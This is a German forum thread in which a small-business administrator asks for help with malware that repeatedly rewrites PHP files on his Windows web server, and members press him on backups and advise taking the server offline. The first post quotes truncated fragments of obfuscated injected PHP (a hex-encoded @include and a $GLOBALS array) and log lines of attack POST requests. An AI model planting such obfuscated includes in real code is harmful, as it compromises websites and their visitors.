Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum

Diskussionsforum: Trojaner befällt am Windows-Webserver PHP-Dateien

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 24.04.2017, 10:56   #1
Koloss78
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Hallo,

Seit einiger Zeit werden meine Websites scheinbar von einem Trojaner befallen und ich weis nicht wie ich ihn beseitigen kann. Der Trojaner modifiziert bei mir einige PHP-Dateien und vor allem die Index.php Datei.
Wenn ich die seiten wieder korrigiere passiert wieder das selbe in den nächsten Tagen.
Hier ein paar Beispiele:

Fall 1:
HTML-Code:
/*7148c*/

@include "\x44:\x57WW\pi\x6cko\x2eat\x2fin\ usw.
/*7148c*/
Fall 2:
HTML-Code:
;$GLOBALS['y5097']=Array();global$y5097;$y5097=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['q7002']="\x61\x24\x65\x37\x71 usw.
Die Attacken sehen dann so aus, diese kommen dann meistens in der nacht:
Code:
ATTFilter
2017-04-24 04:23:36 POST /shopgate/ext/general17.php - 80 - 107.180.112.216 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 404 0 2 115
2017-04-24 04:23:39 POST /admin/includes/magnalister/cache/ini.php - 80 - 49.50.8.226 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 404 0 2 316
2017-04-24 04:23:44 POST /admin/gm/gm_opensearch/gm_opensearch_conf.php - 80 - 182.50.130.166 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 200 0 0 1767
2017-04-24 04:23:44 POST /hqeecy - 80 - 178.63.91.30 Mozilla/5.0+(X11;+Linux+x86_64;+rv:29.0)+Gecko/20100101+Firefox/29.0+SeaMonkey/2.26 404 0 2 26
2017-04-24 04:23:44 POST /index.php fkvk=drmw 80 - 178.63.91.30 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 200 0 0 32
         
<?

Hat jemand Eufahrung mit so einen Trojaner.

Folgendes habe ich bereits gemacht
1. PHP upgedatet
2. Alle von mir gefundenen modifizierten Dateien behoben korrigiert.

Geändert von Koloss78 (24.04.2017 um 11:03 Uhr)

Alt 24.04.2017, 11:41   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Ich fürchte du bist hier im falschen Unterbereich. Oder läuft dein Webserver unter Windows?
__________________

__________________

Alt 24.04.2017, 11:52   #3
Koloss78
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Steht doch im Threadtitel.

WS 2008 R2
__________________

Alt 24.04.2017, 12:44   #4
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Ging aber ziemlich unter. Und einfach nur Windows im Threadtitel ist auch nicht gerade informativ.

Ist das ein gewerblich genutztes System?
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 24.04.2017, 14:26   #5
Koloss78
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Tut das was zur Sache?


Alt 24.04.2017, 14:42   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Glaubst ich frag das nur aus Spaß?
Wir haben hier gewisse Regeln bzgl gewerblich genutzter Systeme. Siehe http://www.trojaner-board.de/108422-...-anfragen.html

Bereinigung von gewerblich genutzten Rechnern

Grundsätzlich bereinigen wir keine gewerblich genutzen Rechner. Dafür ist die IT Abteilung eurer Firma zuständig.


Bei Kleinunternehmen, welche keinen eigenen IT Support haben, machen wir da eine Ausnahme und helfen gerne (kleine Spende hilft auch uns). Voraussetzung: Ihr teilt uns dies in eurer ersten Antwort mit. Bedenkt jedoch, dass Logfiles viele heikle Informationen enthalten können (Kundendaten, Bankdaten, etc.) sowie das Malware genauso wie unsere Scanner die Möglichkeit besitzt, diese auszuspähen und zu missbrauchen. Hier legen wir euch ein Formatieren und Neuaufsetzen nahe. Hier gilt insbesondere, dass wir im Nachhinein keine Logfiles löschen werden, egal wie sehr "euer Chef das auch will".
__________________
--> Trojaner befällt am Windows-Webserver PHP-Dateien

Alt 24.04.2017, 15:06   #7
Koloss78
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Okay, also es laufen nur 2 Gewerblich genutzte Seiten drauf. Ein Gambioshop und eine von mir entwicklelte ISAPI dll.

Sonst laufen 1-3 Joomla/Wordpress seiten drauf. Sind aber eher Privatseiten.

Ja, meine Firma ist sehr klein. Ich selber bin quasi der Systemadmin aber das ist nicht mein Hauptgebiet.
Alle wirklichen Systemadmins die ich kenne empfehlen mir alles auf Linux umzustellen, aber da fehlt mir leider das Wissen dazu. Meine ISAPI DLL würde darauf auch nicht laufen.

Mir geht es aber eigentlich darum wo kann ich da jetzt anpacken.


Zusätzliche Info zum Trojaner, er versucht über das Include immer eine Datei faviicon_xxxxx.ico anzulegen.

Alt 24.04.2017, 19:16   #8
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Zitat:
Alle wirklichen Systemadmins die ich kenne empfehlen mir alles auf Linux umzustellen
Das hätte ich auch getan. Windows als Webserver, oje...

Desktop-Systeme kann man gut bereinigen. Aber bei Webservern und dann auch noch Windows ist das was anderes.

1. Warum hast du kein Desaster-Recpvery-Konzept? Du verarbeitest und speicherst sensible Kundendaten!
2. Was genau alles kann man aus dem Internet auf diesem Rechner erreichen, sprich wie das das Teil über welche Maßnahmen abgesichert?
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 24.04.2017, 19:52   #9
Koloss78
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Wir kommen hier scheinbar so nicht weiter! Hm...

Alt 24.04.2017, 23:09   #10
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Wieso kannst du nicht einfach die Fragen beantworten?
Dein System wurde erwischt, und? Dann muss man sich auch den Konsquenzen und Fragen stellen.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 25.04.2017, 09:14   #11
Koloss78
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Deine Fragen helfen mir nicht weiter, im nachhinein ist man immer schlauer.

Möchtest du helfen oder nicht? Es geht doch jetzt rein darum wie man die Trojaner jetzt bekämpft. Scheinbar weist du es nicht und lenkst mich mit zum jetzigen Zeitpunkt sinnlosen Fragen ab.

Sorry, aber ich verstehe deine Fragen nicht !!!

Wie du oben lesen kannst, bin ich kein richtiger Systemadmin und deswegen kann ich auch logischerweise keine hoch sicherheitskonzepte präsentieren!

Alt 25.04.2017, 09:23   #12
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Genau. Ich hab 160.000 Beiträge die nur vor lauter Unwissenheit strotzen.

Wie der Webserver von außen erreichbar ist ja auch voll unwichtig. Hat ja nur was mit Sicherheit zu tun. Und Backups? Ach was, das ist eh nur was für Weicheier.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 25.04.2017, 11:45   #13
W_Dackel
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Da ich kein Anwalt bin ist dies keine Rechtsberatung, sondern ein Tipp meine Behauptung per Google zu prüfen: wenn du einen gekaperten Webserver (ob per Trojaner oder eine beliebige andere Sicherheitslücke) betreibst bist du zivilrechtlich für alles haftbar was der Server anstellt, gerade auch die Dinge die der Kriminelle mit deinem Server anstellt. Nur falls der Kriminelle geschnappt werden sollte kannst du versuchen ihn auf Schadenersatz zu verklagen.


Ich kam darauf als ich drüber nachdachte mir einen Server zu mieten... und ließ es dann bleiben.

Die logische Konsequenz wäre also dass du deinen Server vom Netz nimmst bis die Art des Einbruchs ("Trojaner" ist bei Servern eher selten) geklärt und die Sicherheitslücke geschlossen ist. Der ist och zur Zeit bestimmt noch am Netz? Wenn ja: dein Risiko,

Alt 25.04.2017, 13:48   #14
Koloss78
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Ich gebe auch ja Teilweise recht, nur Theorie und Praxis ist ein wesentlicher Unterschied!

Bin doch dabei den Server zu säubern, nur ist das ganze nicht so leicht, wenn die Seite Offline ist, passiert auch nichts.

Alt 25.04.2017, 14:23   #15
W_Dackel
 
Trojaner befällt am Windows-Webserver PHP-Dateien - Standard

Trojaner befällt am Windows-Webserver PHP-Dateien



Wenn du die Dienste offline gestellt hast und die Logdateien erstmal gesichert hast dann bist du auf nem guten Pfad. Um herauszufinden wie der Einbruch geschah fürchte ich dass du einen Server Profi benötigst...

Antwort

Themen zu Trojaner befällt am Windows-Webserver PHP-Dateien
attacke, attacken, befallen, befällt, beseitigen, code, einiger, html, include, index.php, linux, nacht, nicht, schei, troja, trojaner, ubuntu, websites



Ähnliche Themen: Trojaner befällt am Windows-Webserver PHP-Dateien


  1. Admins aufgepasst: Krypto-Trojaner befällt hunderte Webserver
    Nachrichten - 24.02.2016 (0)
  2. Windows 7: "HealthAlert" befällt alle Browser
    Log-Analyse und Auswertung - 25.01.2015 (13)
  3. Webserver-Rootkit befällt auch lighttpd und nginx
    Nachrichten - 08.05.2013 (0)
  4. Rootkit befällt Linux-Webserver
    Nachrichten - 20.11.2012 (0)
  5. Windows 8 Genuine Advantage Lizenz ukash befällt selbst abgesicherten Modus
    Plagegeister aller Art und deren Bekämpfung - 10.09.2012 (15)
  6. Windows Verschlüsselungs Trojaner --> Dateien Entschlüsseln
    Log-Analyse und Auswertung - 05.06.2012 (1)
  7. Windows Sicherheits-Trojaner, Dateien gelocked
    Plagegeister aller Art und deren Bekämpfung - 30.04.2012 (9)
  8. ZeuS-Trojaner befällt Android
    Nachrichten - 13.07.2011 (0)
  9. Welche Dateien befällt der 10 Tan Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 05.06.2011 (16)
  10. Trojaner/Virus befällt alle .exe Dateien / AntiVir ohne Wirkung / Malware?
    Plagegeister aller Art und deren Bekämpfung - 05.09.2010 (11)
  11. Trojaner befällt alle exe.dateien
    Plagegeister aller Art und deren Bekämpfung - 05.09.2010 (1)
  12. Welche Dateien befällt "yaludle.a"
    Plagegeister aller Art und deren Bekämpfung - 10.04.2010 (1)
  13. lokaler webserver? trojaner? dienst?
    Plagegeister aller Art und deren Bekämpfung - 11.03.2009 (1)
  14. Webserver -> Trojaner
    Plagegeister aller Art und deren Bekämpfung - 19.10.2008 (1)
  15. TMP dateien und Windows Update Trojaner
    Log-Analyse und Auswertung - 17.01.2008 (0)
  16. Trojaner auf dem Webserver
    Plagegeister aller Art und deren Bekämpfung - 14.01.2008 (2)
  17. Trojaner dldr.agent.br.2/ befällt aklsp.dll -> Keine Hosts mehr erreichbar
    Plagegeister aller Art und deren Bekämpfung - 16.11.2004 (8)

Zum Thema Trojaner befällt am Windows-Webserver PHP-Dateien - Hallo, Seit einiger Zeit werden meine Websites scheinbar von einem Trojaner befallen und ich weis nicht wie ich ihn beseitigen kann. Der Trojaner modifiziert bei mir einige PHP-Dateien und vor - Trojaner befällt am Windows-Webserver PHP-Dateien...
Archiv
Du betrachtest: Trojaner befällt am Windows-Webserver PHP-Dateien auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.